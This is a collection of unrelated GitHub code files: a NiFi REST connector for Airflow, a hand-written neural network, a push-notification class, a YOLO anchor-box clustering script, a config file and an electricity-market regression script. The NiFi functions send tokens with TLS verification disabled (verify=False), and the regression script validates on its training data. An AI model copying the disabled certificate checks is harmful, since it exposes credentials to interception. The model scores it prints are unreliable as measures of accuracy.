'password' and\n    fitting values.\n    :return: JWT Token\n    \"\"\"\n\n    header = {\n        \"Accept-Encoding\": \"gzip, deflate, br\",\n        \"Content-Type\": \"application/x-www-form-urlencoded\",\n        \"Accept\": \"*/*\",\n    }\n    response = requests.post(\n        url_nifi_api + \"access/token\", headers=header, data=access_payload, verify=False\n    )\n    return response.content.decode(\"ascii\")\n\ndef get_processor(url_nifi_api: str, processor_id: str, token=None):\n    \"\"\"\n    Gets and returns a single processor.\n    Makes use of the REST API `/processors/{processor_id}`.\n    :param url_nifi_api: String\n    :param processor_id: String\n    :param token: JWT access token\n    :returns: JSON object processor\n    \"\"\"\n\n    # Authorization header\n    header = {\n        \"Content-Type\": \"application/json\",\n        \"Authorization\": \"Bearer {}\".format(token),\n    }\n\n    # GET processor and parse to JSON\n    response = requests.get(url_nifi_api + f\"processors/{processor_id}\", headers=header, verify=False)\n    return json.loads(response.content)\n\ndef update_processor_status(processor_id: str, new_state: str, token, url_nifi_api):\n    \"\"\"Starts or stops a processor by retrieving the processor to get\n    the current revision and finally putting a JSON with the desired\n    state towards the API.\n    :param processor_id: Id of the processor to receive the new state.\n    :param new_state: String representing the new state, acceptable\n    values are: STOPPED or RUNNING.\n    :param token: a JWT access token for NiFi.\n    :param url_nifi_api: URL to the NiFi API\n    :return: None\n    \"\"\"\n\n    # Retrieve processor from `/processors/{processor_id}`\n    processor = get_processor(url_nifi_api, processor_id, token)\n\n    # Create a JSON with the new state and the processor's revision\n    put_dict = {\n        \"revision\": processor[\"revision\"],\n        \"state\": new_state,\n        \"disconnectedNodeAcknowledged\": True,\n    }\n\n    # Dump JSON and POST processor\n    payload = json.dumps(put_dict).encode(\"utf8\")\n\n    header = {\n        \"Content-Type\": \"application/json\",\n        \"Authorization\": \"Bearer {}\".format(token),\n    }\n\n    response = requests.put(\n        url_nifi_api + f\"processors/{processor_id}/run-status\",\n        headers=header,\n        
data=payload,\n verify=False\n )\n #urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n return response\n ","repo_name":"TianaDoto/ece_pipeline_2022","sub_path":"Projet_exam/airflow/dags/nifi_airflow_connector.py","file_name":"nifi_airflow_connector.py","file_ext":"py","file_size_in_byte":2856,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"37374769228","text":"\r\nimport numpy as np\r\nfrom time import time\r\nimport random\r\nimport pickle\r\nimport tkinter as tk\r\nfrom tkinter import ttk\r\nimport ttkbootstrap as ttk\r\n\r\n\r\nclass Reseau():\r\n def __init__(self,taille:[int],act_function='sigmoid',input_parameters=None,stored_dataset=[],symbols={}):\r\n self.taille = taille\r\n self.act_function = act_function\r\n self.stored_dataset = stored_dataset\r\n self.symbols = symbols # dictionnaire associant à chaque symbole (écrit en string) son nombre de représentations dans data_set\r\n self.weights = [[]] + [np.random.uniform(-3,3,(self.taille[i],self.taille[i-1])) for i in range(1,len(self.taille))]\r\n self.biases = [[]] + [np.random.uniform(-2,2,(self.taille[i],1)) for i in range(1,len(self.taille))]\r\n if not input_parameters is None :\r\n self.weights = input_parameters[0]\r\n self.biases = input_parameters[1]\r\n\r\n self.manual_stop = False\r\n self.accuracy = -1\r\n self.average_cost = -1\r\n self.total_generations = 0\r\n self.total_duration = 0\r\n\r\n\r\n def activation_function(self,t):\r\n if self.act_function == 'sigmoid' :\r\n return 1 / (1+np.exp(-t))\r\n\r\n def der_activation_function(self,t):\r\n if self.act_function == 'sigmoid' :\r\n return np.exp(-t) / (1+np.exp(-t))**2\r\n\r\n def normalized(self,DATA):\r\n # if isinstance(DATA[-1][0], list) or len(DATA[-1][0].shape) != 2 :\r\n if isinstance(DATA[-1][0],np.ndarray) and len(DATA[-1][0].shape) == 2 : return DATA\r\n for i in range(len(DATA)) :\r\n DATA[i][0] = np.reshape(DATA[i][0],(-1,1)).astype(float)\r\n DATA[i][1] = np.reshape(DATA[i][1],(-1,1)).astype(float)\r\n\r\n return DATA\r\n\r\n def shuffled_data(self,DATA,data_shrink,data_number):\r\n nb_elements = min(data_number, data_shrink*len(DATA),)\r\n return random.sample(DATA,nb_elements)\r\n\r\n def string_duration(self,seconds):\r\n seconds = int(seconds)\r\n if seconds < 60:\r\n return f\"{seconds}s\"\r\n minutes, seconds = seconds // 60, seconds % 60\r\n if minutes < 60:\r\n return f\"{minutes}min {seconds}s\"\r\n hours, minutes = minutes // 60, minutes % 60\r\n return f\"{hours}h {minutes}min\"\r\n\r\n def set_stop(self):\r\n self.manual_stop = True\r\n\r\n def reset_everything(self):\r\n self.__init__(taille=self.taille,stored_dataset=self.stored_dataset,symbols=self.symbols)\r\n\r\n def evaluate_accuracy(self,data=None,do_print=False):\r\n if data is None :\r\n if len(self.stored_dataset) == 0 : raise Exception(\"pas de stored_dataset, impossible de calculer l'accuracy\")\r\n data = self.stored_dataset\r\n data = self.normalized(data)\r\n correct_results = 0\r\n\r\n for entree, sortie_attendue in data:\r\n sortie = self.feedforward(entree)\r\n smoothed_sortie = [0 if x<0.5 else 1 for x in sortie]\r\n smoothed_sortie_attendue = [0 if x<0.5 else 1 for x in sortie_attendue]\r\n if smoothed_sortie == smoothed_sortie_attendue :\r\n correct_results += 1\r\n\r\n self.accuracy = correct_results / len(data)\r\n if do_print==True : print(self.accuracy)\r\n\r\n\r\n def evaluate_cost(self,data=None,do_print=False): # renvoie la moyenne des coûts C0 pour chaque exemple (i.e. 
somme des carrés des écarts de chaque neuronne de la dernière couche)\r\n        if data is None :\r\n            if self.stored_dataset == [] : raise Exception('pas de stored_dataset, impossible de calculer la précision')\r\n            data = self.stored_dataset\r\n        data = self.normalized(data)\r\n\r\n        total_cost = 0.0\r\n        for entree,sortie_attendue in data :\r\n            sortie = self.feedforward(entree)\r\n            for a_calc,a_att in zip(sortie, sortie_attendue) :\r\n                total_cost += float((a_calc - a_att)**2)\r\n\r\n        average_cost = total_cost / len(data) / self.taille[-1]  # coût moyen par neuronne final par exemple\r\n        self.average_cost = average_cost\r\n\r\n        if do_print == True :\r\n            print(f\"le côut moyen par neuronne final par exemple est de {self.average_cost}\")\r\n\r\n\r\n    def feedforward(self,A_K:[float],J=1): # entrée A_K : vecteur colonne des activations de la couche K, précédent la couche suivante J, on va jusqu'à la dernière couche récursivement\r\n        # if isinstance(A_K,list) or len(A_K.shape) !=2 : raise ValueError('PAS un vecteur colonne en entrée de feedforward')\r\n        A_K = np.reshape(A_K,(-1,1))\r\n        if J == len(self.taille) :\r\n            return A_K\r\n        else :\r\n            W_J = self.weights[J]\r\n            B_J = self.biases[J]\r\n            Z_J = np.dot(W_J, A_K) + B_J\r\n            A_J = self.activation_function(Z_J)\r\n\r\n            return self.feedforward(A_J,J+1)\r\n\r\n    def all_activations(self,entree):\r\n        entree = np.reshape(entree,(-1,1))\r\n        A_K, J, all_A,all_Z = entree, 1, [entree], [[]]\r\n        while J < len(self.taille) :\r\n            W_J = self.weights[J]\r\n            B_J = self.biases[J]\r\n            Z_J = np.dot(W_J,A_K) + B_J\r\n            A_K = self.activation_function(Z_J)\r\n\r\n            all_A.append(A_K)\r\n            all_Z.append(Z_J)\r\n            J += 1\r\n        return [all_A,all_Z]\r\n\r\n\r\n    def gradient_local(self,entree,sortie_attendue): # entree et sortie_attendue doivent être des vecteurs colonnes\r\n        entree = np.reshape(entree,(-1,1))\r\n        sortie_attendue = np.reshape(sortie_attendue,(-1,1))\r\n\r\n\r\n        partial_derivatives_weights = [np.zeros_like(self.weights[K]) for K in range(len(self.taille))]\r\n        partial_derivatives_biases = [np.zeros_like(self.biases[K]) for K in range(len(self.taille))]\r\n\r\n        all_A, all_Z = self.all_activations(entree)\r\n        sortie = all_A[-1]\r\n\r\n        par_der_A_S = par_der_A_K = np.array([ 2 * 1 * (sortie[k,0] - sortie_attendue[k,0]) for k in range(len(sortie)) ]).reshape(-1,1)\r\n        J = len(self.taille)-1\r\n        while J > 0 :\r\n            K = J-1\r\n            par_der_A_J = par_der_A_K\r\n\r\n            # Activations : d a_k0 = sum(i=1 à l(J) de drond_cout a_j * σ'(z_j) * w_jk0 )\r\n            par_der_A_K = np.zeros_like(all_A[K])\r\n            for j in range(len(par_der_A_J)) :\r\n                par_der_A_K += par_der_A_J[j] * self.der_activation_function(all_Z[J][j]) * self.weights[J][j,np.newaxis].T\r\n\r\n            # Biais : d b_j0 = drond_cout a[_j0 * σ'(z_j0) * 1\r\n            partial_derivatives_biases[J] += par_der_A_J * self.der_activation_function(all_Z[J]) * 1\r\n\r\n            # Poids : d w_j0k0 = drond_cout a_j0 * σ'(z_j0) * a_k0\r\n            partial_derivatives_weights[J] += all_A[K].T  # On place d'abord a_k dans chaque colonne k\r\n            partial_derivatives_weights[J] *= par_der_A_J * self.der_activation_function(all_Z[J])  # on multiplie ensuite chaque ligne j par drond a_j * σ'(z_j)\r\n\r\n            # Récursivement, on calcule maintenant les dérivées partielles des poids associés à la couche précédente (en s'appuyant sur les dérivées partielles des activations de cette couche)\r\n            J -= 1\r\n\r\n\r\n        return [partial_derivatives_weights,partial_derivatives_biases]\r\n\r\n\r\n\r\n    def apprendre(self,DATA:[ [[float],[float]] ]=None,pas=10.0, affichage_graphique=True, 
data_shrink=1.0,data_number=None,precision=1.01,duration=999999999,nb_generations=999999999,CHECK_PROPORTION=0.1):\r\n if DATA is None : DATA = self.stored_dataset\r\n if data_number is None : data_number = len(DATA)\r\n gen_count,start_time,elapsed_time, DATA,nb_seconds = 0,time(), 0, self.normalized(DATA),0\r\n if duration == 999999999 and nb_generations == 999999999 : raise Exception(\"pas de fin d'apprentissage !\")\r\n\r\n # Gère la partie affichage\r\n if affichage_graphique == True :\r\n window = ttk.Window()\r\n\r\n gen_count_tk = tk.StringVar(value='0 générations')\r\n av_cost_tk = tk.StringVar(value=f'coût moyen : {self.average_cost}')\r\n duree_tk = tk.StringVar(value=self.string_duration(0))\r\n\r\n\r\n global_frame = ttk.Frame(master=window)\r\n global_frame.pack()\r\n\r\n stop_button = ttk.Button(master=global_frame,text='stop',command= self.set_stop)\r\n stop_button.pack()\r\n\r\n gens_text = ttk.Label(master=global_frame,textvariable=gen_count_tk)\r\n gens_text.pack()\r\n\r\n duree_text = ttk.Label(master=global_frame,textvariable=duree_tk)\r\n duree_text.pack()\r\n\r\n av_cost_text = ttk.Label(master=global_frame,textvariable=av_cost_tk)\r\n av_cost_text.pack()\r\n\r\n\r\n\r\n\r\n window.update()\r\n\r\n def criteria_reached():\r\n nonlocal gen_count, elapsed_time,nb_seconds\r\n # if np.random.random() <= CHECK_PROPORTION :\r\n # self.evaluate_accuracy(DATA)\r\n gen_count += 1\r\n elapsed_time = time() - start_time\r\n if int(elapsed_time) > nb_seconds : # mises à jour 1fois par seconde\r\n nb_seconds = int(elapsed_time)\r\n print(f'{nb_seconds}s passées')\r\n self.evaluate_accuracy(DATA)\r\n self.evaluate_cost(DATA)\r\n if affichage_graphique :\r\n # gen_count_tk.set(f'{gen_count} générations')\r\n av_cost_tk.set(f'coût moyen : {self.average_cost}')\r\n duree_tk.set(self.string_duration(elapsed_time))\r\n pass\r\n\r\n if affichage_graphique :\r\n gen_count_tk.set(f'{gen_count} générations')\r\n window.update()\r\n\r\n return gen_count >= nb_generations or elapsed_time >= duration or self.manual_stop\r\n\r\n while not criteria_reached() :\r\n\r\n data = self.shuffled_data(DATA,data_shrink,data_number)\r\n\r\n G_global_W = [np.zeros_like(self.weights[K]) for K in range(len(self.taille))]\r\n G_global_B = [np.zeros_like(self.biases[K]) for K in range(len(self.taille))]\r\n for entree, sortie_attendue in data :\r\n G_local_W, G_local_B = self.gradient_local(entree,sortie_attendue)\r\n G_global_W = [arr_glob + arr_loc for arr_glob,arr_loc in zip(G_global_W,G_local_W)]\r\n G_global_B = [arr_glob + arr_loc for arr_glob,arr_loc in zip(G_global_B,G_local_B)]\r\n\r\n # print(f\"gen{gen_count} : gradient_weights=\\n {G_global_W[1]}\")\r\n # print(f\"gen{gen_count} : gradient_biases=\\n {G_global_B[1]}\")\r\n\r\n self.weights = [arrW + pas * (-g_global_W) / len(data) for arrW,g_global_W in zip(self.weights,G_global_W)]\r\n self.biases = [arrB + pas * (-g_global_B) / len(data) for arrB, g_global_B in zip(self.biases,G_global_B)]\r\n\r\n\r\n\r\n print('finished working !')\r\n # self.evaluate_accuracy(DATA)\r\n self.manual_stop = False\r\n self.total_generations += gen_count\r\n self.total_duration += nb_seconds\r\n print(f'\\nnb générations faites : {gen_count} ({self.total_generations}) | durée : {self.string_duration(elapsed_time)}')\r\n\r\n if affichage_graphique :\r\n 
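# keep the Tk window open after training so the final cost and duration stay visible\r\n            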
window.mainloop()\r\n\r\n\r\n\r\n","repo_name":"GoldEEr17/TIPE_Dobble","sub_path":"reseau_general.py","file_name":"reseau_general.py","file_ext":"py","file_size_in_byte":11192,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"24800361541","text":"from apps.activity import jinja_tags\nfrom canvas.notifications.base_channel import CommunicationsChannel\nfrom drawquest.apps.push_notifications import models\n\n\nclass PushNotificationChannel(CommunicationsChannel):\n recipient_actions = [\n 'quest_of_the_day',\n 'new_palettes',\n 'facebook_friend_joined',\n 'starred',\n ]\n\n @classmethod\n def enabled_for_recipient_action(cls, action, recipient, pending_notification=None, *args, **kwargs):\n flag = super(PushNotificationChannel, cls).enabled_for_recipient_action(\n action, recipient, pending_notification=pending_notification, *args, **kwargs)\n\n try:\n return flag and not models.is_unsubscribed(recipient, action)\n except ValueError:\n return flag\n\n def _push(self, notification, alert, extra_metadata={}, badge=None):\n recipient = notification.recipient\n models.push_notification(notification.action, alert,\n recipient=recipient, extra_metadata=extra_metadata, badge=badge)\n\n def _action_facebook_friend_joined(self, notification):\n self._push(notification, \"{} {} has joined DrawQuest!\".format(notification.actor.facebookuser.first_name,\n notification.actor.facebookuser.last_name),\n extra_metadata={'username': notification.actor.username})\n\n def _action_starred(self, notification):\n self._push(notification, \"{} has starred your drawing!\".format(notification.actor.username),\n extra_metadata={\n 'comment_id': notification.comment_sticker.comment.id,\n 'quest_id': notification.comment_sticker.comment.parent_comment_id,\n })\n\n def deliver(self, notification):\n getattr(self, '_action_' + notification.action)(notification)\n\n","repo_name":"canvasnetworks/canvas","sub_path":"website/drawquest/apps/push_notifications/push_notification_channel.py","file_name":"push_notification_channel.py","file_ext":"py","file_size_in_byte":1911,"program_lang":"python","lang":"en","doc_type":"code","stars":57,"dataset":"github-code","pt":"32"} +{"seq_id":"13582063550","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Feb 17 17:43:39 2019\n\n@author: deniz\n\"\"\"\n\nimport json\nimport os\nimport math\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport seaborn as sns; sns.set() # for plot styling\n\nos.chdir(\"/media/deniz/02B89600B895F301/BBD100K\")\ntrain_path = \"data/labels/train/bdd100k_labels_images_train.json\"\n\nwith open(train_path,\"r\") as ftr:\n trlabel = json.load(ftr)\n \nBBDlabeldict = {\"bike\":0,\n \"bus\":1,\n \"car\":2,\n \"motor\":3,\n \"person\":4,\n \"rider\":5,\n \"traffic light\":6,\n \"traffic sign\":7,\n \"train\":8,\n \"truck\":9,\n \"drivable area\":[],\n \"lane\":[]}\n\nw,h = [] , []\nfor ind1 in range(len(trlabel)):\n for ind2 in range(len(trlabel[ind1][\"labels\"])):\n try:\n a=trlabel[ind1][\"labels\"][ind2][\"box2d\"] #traffic sign\n x1,y1,x2,y2 = list(a.values())\n width = abs(x1-x2)\n height = abs(y1-y2)\n w.append(width)\n h.append(height)\n except:\n pass\nw=np.asarray(w)\nh=np.asarray(h)\n \nx=[w,h]\nx=np.asarray(x)\nx=x.transpose()\n########################################## K- Means\n##########################################\n\nfrom sklearn.cluster import KMeans\nkmeans3 = KMeans(n_clusters=9)\nkmeans3.fit(x)\ny_kmeans3 = 
kmeans3.predict(x)\n\n##########################################\ncenters3 = kmeans3.cluster_centers_\n\nyolo_anchor_average=[]\nfor ind in range (9):\n    yolo_anchor_average.append(np.mean(x[y_kmeans3==ind],axis=0))\n\nyolo_anchor_average=np.array(yolo_anchor_average)\n\nplt.scatter(x[:, 0], x[:, 1], c=y_kmeans3, s=2, cmap='viridis')\nplt.scatter(yolo_anchor_average[:, 0], yolo_anchor_average[:, 1], c='red', s=50);\nyoloV3anchors = yolo_anchor_average\nyoloV3anchors[:, 0] =yolo_anchor_average[:, 0] /1280 *608\nyoloV3anchors[:, 1] =yolo_anchor_average[:, 1] /720 *608\nyoloV3anchors = np.rint(yoloV3anchors)\nfig, ax = plt.subplots()\nfor ind in range(9):\n    rectangle= plt.Rectangle((304-yoloV3anchors[ind,0]/2,304-yoloV3anchors[ind,1]/2), yoloV3anchors[ind,0],yoloV3anchors[ind,1] , fc='b',edgecolor='b',fill = None)\n    ax.add_patch(rectangle)\nax.set_aspect(1.0)\nplt.axis([0,608,0,608])\nplt.show()\nyoloV3anchors.sort(axis=0)\nprint(\"Your custom anchor boxes are {}\".format(yoloV3anchors))\n\nF = open(\"YOLOV3_BDD_Anchors.txt\", \"w\")\nF.write(\"{}\".format(yoloV3anchors))\nF.close() \n \n\n","repo_name":"decanbay/YOLOv3-Calculate-Anchor-Boxes","sub_path":"YOLOv3_get_anchors.py","file_name":"YOLOv3_get_anchors.py","file_ext":"py","file_size_in_byte":2463,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"32"} +{"seq_id":"17903868743","text":"import os\nimport torch\n\n\nDEVICE = \"cuda\" if torch.cuda.is_available() else \"cpu\"\nBATCH_SIZE = 64\nIMAGE_SIZE = 256\nNUM_WORKERS = 4\nPIN_MEMORY = True\nDATASET_PATH = \"./crowdai/\"\nSAVED_PATH = \"./saved/Models\"\nVAL_SIZE = 0.2\nMODEL = \"ResNet18\"\nN_CLASSES = len(os.listdir(DATASET_PATH))","repo_name":"shashi7679/Plant-Disease-Detector","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":305,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"16621505396","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.linear_model import LinearRegression, ElasticNet, Lasso\nfrom sklearn.metrics import mean_squared_error\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.ensemble import RandomForestRegressor\n\n# import data from csv files\ngeneration_per_type = pd.read_csv('SEF-ML/data/actual_aggregated_generation_per_type.csv')\napx_price = pd.read_csv('SEF-ML/data/apx_day_ahead.csv')\ngeneration_day_ahead = pd.read_csv('SEF-ML/data/day_ahead_aggregated_generation.csv')\nderived_system_wide_data = pd.read_csv('SEF-ML/data/derived_system_wide_data.csv')\nforecast_day_and_day_ahead_demand_data = pd.read_csv('SEF-ML/data/forecast_day_and_day_ahead_demand_data.csv')\ninitial_demand_outturn = pd.read_csv('SEF-ML/data/initial_demand_outturn.csv')\ninterconnectors = pd.read_csv('SEF-ML/data/interconnectors.csv')\nloss_of_load_probability = pd.read_csv('SEF-ML/data/loss_of_load_probability.csv')\nmarket_index_data = pd.read_csv('SEF-ML/data/market_index_data.csv')\nwind_generation_forecast_and_outturn = pd.read_csv('SEF-ML/data/wind_generation_forecast_and_outturn.csv')\nrenewable_generation_forecast = pd.read_csv('SEF-ML/data/day_ahead_generation_forecast_wind_and_solar.csv')\nforecast_demand = pd.read_csv('SEF-ML/data/forecast_day_and_day_ahead_demand_data.csv')\n\n# set the index of each data frame to begin at 0\ngeneration_per_type.set_index('Unnamed: 0', inplace=True)\napx_price.set_index('Unnamed: 0', 
inplace=True)\ngeneration_day_ahead.set_index('Unnamed: 0', inplace=True)\nderived_system_wide_data.set_index('Unnamed: 0', inplace=True)\nforecast_day_and_day_ahead_demand_data.set_index('Unnamed: 0', inplace=True)\ninitial_demand_outturn.set_index('Unnamed: 0', inplace=True)\ninterconnectors.set_index('Unnamed: 0', inplace=True)\nloss_of_load_probability.set_index('Unnamed: 0', inplace=True)\nmarket_index_data.set_index('Unnamed: 0', inplace=True)\nwind_generation_forecast_and_outturn.set_index('Unnamed: 0', inplace=True)\nrenewable_generation_forecast.set_index('Unnamed: 0', inplace=True)\nforecast_demand.set_index('Unnamed: 0', inplace=True)\n\n# sort each data frame in index order\ngeneration_per_type.sort_index(inplace=True)\napx_price.sort_index(inplace=True)\nrenewable_generation_forecast.sort_index(inplace=True)\nforecast_demand.sort_index(inplace=True)\ngeneration_day_ahead.sort_index(inplace=True)\nderived_system_wide_data.sort_index(inplace=True)\nforecast_day_and_day_ahead_demand_data.sort_index(inplace=True)\ninitial_demand_outturn.sort_index(inplace=True)\ninterconnectors.sort_index(inplace=True)\nloss_of_load_probability.sort_index(inplace=True)\nmarket_index_data.sort_index(inplace=True)\nwind_generation_forecast_and_outturn.sort_index(inplace=True)\n\n# ---------------------------------------------------------------------\n# Data Pre-processing\n# combine all data frames into a single raw data set\nraw_data = pd.concat([generation_per_type, apx_price, renewable_generation_forecast, forecast_demand,\n                      generation_day_ahead, derived_system_wide_data, forecast_day_and_day_ahead_demand_data,\n                      initial_demand_outturn, interconnectors, loss_of_load_probability,\n                      market_index_data, wind_generation_forecast_and_outturn], axis=1, sort=True)\n\n\ndef preprocess_features(raw_data):\n    \"\"\"Prepares input features from the merged electricity market data.\n\n    Args:\n      raw_data: A Pandas DataFrame expected to contain the concatenated\n        market data frames.\n    Returns:\n      A DataFrame that contains the features to be used for the model, including\n      synthetic features.\n    \"\"\"\n\n    # Create a copy of the raw data and then drop all duplicates and label data.\n    processed_features = raw_data.copy()\n    processed_features = processed_features.loc[:, ~processed_features.columns.duplicated()]\n\n    # Drop unwanted data or fill if applicable\n    indexNames = processed_features[processed_features['quantity'] < 10000].index\n    processed_features.drop(indexNames, inplace=True)\n    processed_features.drop(\"intnemGeneration\", axis=1, inplace=True)\n    processed_features.drop('settlementDate', axis=1, inplace=True)\n    processed_features.drop('systemSellPrice', axis=1, inplace=True)\n    processed_features.drop('sellPriceAdjustment', axis=1, inplace=True)\n    processed_features.drop('FossilOil', axis=1, inplace=True)\n    processed_features['initialWindForecast'].fillna(method='ffill', inplace=True)\n    processed_features['latestWindForecast'].fillna(method='ffill', inplace=True)\n    processed_features['reserveScarcityPrice'].fillna(0, inplace=True)\n    processed_features['drm2HourForecast'].fillna(processed_features['drm2HourForecast'].mean(), inplace=True)\n    processed_features['lolp1HourForecast'].fillna(0, inplace=True)\n    processed_features.dropna(inplace=True)\n\n\n\n    # Separate targets and features.\n    processed_target = processed_features['indicativeNetImbalanceVolume'].copy()\n\n    # Create synthetic features.\n    processed_features.loc[:, 'RenewablePrediction'] = (processed_features.loc[:, 'solar'] +\n                                                        processed_features.loc[:, 'wind_off'] +\n                                                        
renewable_generation_forecast.loc[:, 'wind_on'])\n processed_features['Val_Diff'] = processed_features['initialWindForecast'] \\\n - processed_features['latestWindForecast']\n processed_features['Solar_Frac'] = processed_features['solar'] / processed_features['quantity']\n processed_features['Wind_Frac'] = (processed_features['wind_off'] + processed_features['wind_on'])\\\n / processed_features['quantity']\n processed_features['Renewable_Frac'] = processed_features['RenewablePrediction'] / processed_features['quantity']\n processed_features.indicativeNetImbalanceVolume = processed_features.indicativeNetImbalanceVolume.shift(2)\n processed_features.indicativeNetImbalanceVolume = processed_features.indicativeNetImbalanceVolume.fillna(0)\n\n # Rename columns\n processed_target = processed_target.rename(\"NIV\")\n processed_features.rename({'quantity': 'Generation', 'systemBuyPrice': 'ImbalancePrice',\n 'indicativeNetImbalanceVolume': 'Shift_NIV'}, axis='columns', inplace=True)\n\n return processed_features, processed_target\n\n\ndef log_normalize(series):\n return series.apply(lambda x: np.log(x+1.0))\n\n\ndef clip(series, clip_to_min, clip_to_max):\n return series.apply(lambda x: (min(max(x, clip_to_min), clip_to_max)))\n\n\n[processed_features, processed_targets] = preprocess_features(raw_data)\nprocessed_features_copy = processed_features.copy()\n\nprocessed_features['APXPrice'] = clip(processed_features['APXPrice'], 0, 200)\nprocessed_features['Biomass'] = clip(processed_features['Biomass'], 0, 4000)\nprocessed_features['Nuclear'] = clip(processed_features['Nuclear'], 4000, 10000)\nprocessed_features['OffWind'] = clip(processed_features['OffWind'], 0, 5000)\nprocessed_features['OffWind'] = clip(processed_features['OffWind'], 0, 11000)\nprocessed_features['ImbalancePrice'] = clip(processed_features['ImbalancePrice'], -100, 250)\n\nprocessed_features['FossilHardCoal'] = log_normalize(processed_features['FossilHardCoal'])\nprocessed_features['HydroPumpedStorage'] = log_normalize(processed_features['HydroPumpedStorage'])\nprocessed_features['HydroRunOfRiver'] = log_normalize(processed_features['HydroRunOfRiver'])\nprocessed_features['solar'] = log_normalize(processed_features['solar'])\nprocessed_features['Other'] = log_normalize(processed_features['Other'])\n\n# ----------------------------------------------------------------------------------------------------------------------\n# calculate the correlation matrix, isolate the NIV correlations and then order by the abs value (descending)\n\nprocessed_features = processed_features.loc[processed_features.index > 2016000000, :]\nprocessed_targets = processed_targets.loc[processed_targets.index > 2016000000]\n\nX_train_all = processed_features.loc[processed_features.index < 2018030000, :]\ny_train = processed_targets.loc[processed_targets.index < 2018030000]\n\nX_validate_all = processed_features.loc[processed_features.index < 2018030000, :]\ny_validate = processed_targets.loc[processed_features.index < 2018030000]\n\n# X_validate_all = processed_features.loc[ 2018030000: 2018090000, :]\n# y_validate = processed_targets.loc[ 2018030000 : 2018090000]\n\n# X_test_all = processed_features.loc[processed_features.index > 2018090000, :]\n# y_test = processed_targets.loc[processed_targets.index > 2018090000]\n\n# Normalize the validation data and separate into X and y variables data frames.\ncols_all = ['ImbalancePrice', 'solar', 'Solar_Frac', 'APXPrice',\n 'Biomass', 'Other', 'wind_off', 'initialWindForecast', 'Wind_Frac', 'Val_Diff', ]\n\nX_train = 
X_train_all.loc[:, cols_all]\n\nX_train_mean = X_train.mean()\nX_train_std = X_train.std()\nX_train = (X_train - X_train_mean) / X_train_std\n\nX_validate = X_validate_all.loc[:, cols_all]\nX_validate = (X_validate-X_train_mean)/X_train_std\n\n# ----------------------------------------------------------------------------------------------------------------------\n# Model Training\n# Train each sklearn model\nlin = LinearRegression()\nlin.fit(X_train, y_train)\n\nela = ElasticNet(alpha=0.460)\nela.fit(X_train, y_train)\n\nlass = Lasso(alpha=0.705)\nlass.fit(X_train, y_train)\n\nforest_reg = RandomForestRegressor(n_estimators=400, min_samples_split=2, min_samples_leaf=4, max_features='sqrt',\n                                   max_depth=10, bootstrap=True, random_state=42)\nforest_reg.fit(X_train, y_train)\n\n# Calculate the predictions from each model.\ny_lin_prediction = lin.predict(X_validate)\nlin_mse = mean_squared_error(y_validate, y_lin_prediction)\nlin_rme = np.sqrt(lin_mse)\n\n\ny_ela_prediction = ela.predict(X_validate)\nela_mse = mean_squared_error(y_validate, y_ela_prediction)\nela_rme = np.sqrt(ela_mse)\n\ny_lass_prediction = lass.predict(X_validate)\nlass_mse = mean_squared_error(y_validate, y_lass_prediction)\nlass_rme = np.sqrt(lass_mse)\n\ny_random_forest_prediction = forest_reg.predict(X_validate)\nrandom_forest_mse = mean_squared_error(y_validate, y_random_forest_prediction)\nrandom_forest_rme = np.sqrt(random_forest_mse)\n\n# Static model input for how many periods the data should be shifted and then shift data.\n\n\ndef static_model(data, steps):\n    prediction = data.copy()\n    prediction = prediction.shift(periods=int(steps))\n    return prediction\n\n\n# Periods = input(\"How many settlement periods ahead do you want to predict?: \")\nperiods = 3\nstatic_pred = static_model(y_validate, periods)\n\n# Fill any NaN with 0 and calculate rme\ny_static_pred = static_pred.fillna(0).values\nstatic_mse = mean_squared_error(y_validate, y_static_pred)\nstatic_rmse = np.sqrt(static_mse)\n\n\n# Cross validation\ndef display_scores(scores):\n    print(\"Scores:\", scores)\n    print(\"Mean:\", scores.mean())\n    print(\"Standard deviation:\", scores.std())\n\n\nlin_scores = cross_val_score(lin, X_train, y_train, scoring=\"neg_mean_squared_error\", cv=10)\nlin_rmse_scores = np.sqrt(-lin_scores)\nprint(\"Linear Regression Model\")\ndisplay_scores(lin_rmse_scores)\nprint(lin_rme)\n\nlass_scores = cross_val_score(lass, X_train, y_train, scoring=\"neg_mean_squared_error\", cv=10)\nlass_rmse_scores = np.sqrt(-lass_scores)\nprint(\"LASSO Model\")\ndisplay_scores(lass_rmse_scores)\nprint(lass_rme)\n\nela_scores = cross_val_score(ela, X_train, y_train, scoring=\"neg_mean_squared_error\", cv=10)\nela_rmse_scores = np.sqrt(-ela_scores)\nprint(\"Elastic Net Model\")\ndisplay_scores(ela_rmse_scores)\nprint(ela_rme)\n\nrandom_forest_scores = cross_val_score(forest_reg, X_train, y_train, scoring=\"neg_mean_squared_error\", cv=10)\nrandom_forest_rmse_scores = np.sqrt(-random_forest_scores)\nprint(\"Random Forests Model\")\ndisplay_scores(random_forest_rmse_scores)\nprint(random_forest_rme)\n\nprint()\nprint(\"validation scores\")\nprint(\"Static model RME = \" + str(round(static_rmse, 2)) + 'MWh')\nprint(\"Lasso model RME = \" + str(round(np.mean(lass_rme), 2)) + 'MWh')\nprint(\"Elastic Net model RME = \" + str(round(np.mean(ela_rme), 2)) + 'MWh')\nprint(\"Linear Regression model RME = \" + str(round(np.mean(lin_rme), 2)) + 'MWh')\nprint(\"Random Forest model RME = \" + str(round(np.mean(random_forest_rme), 2)) + 
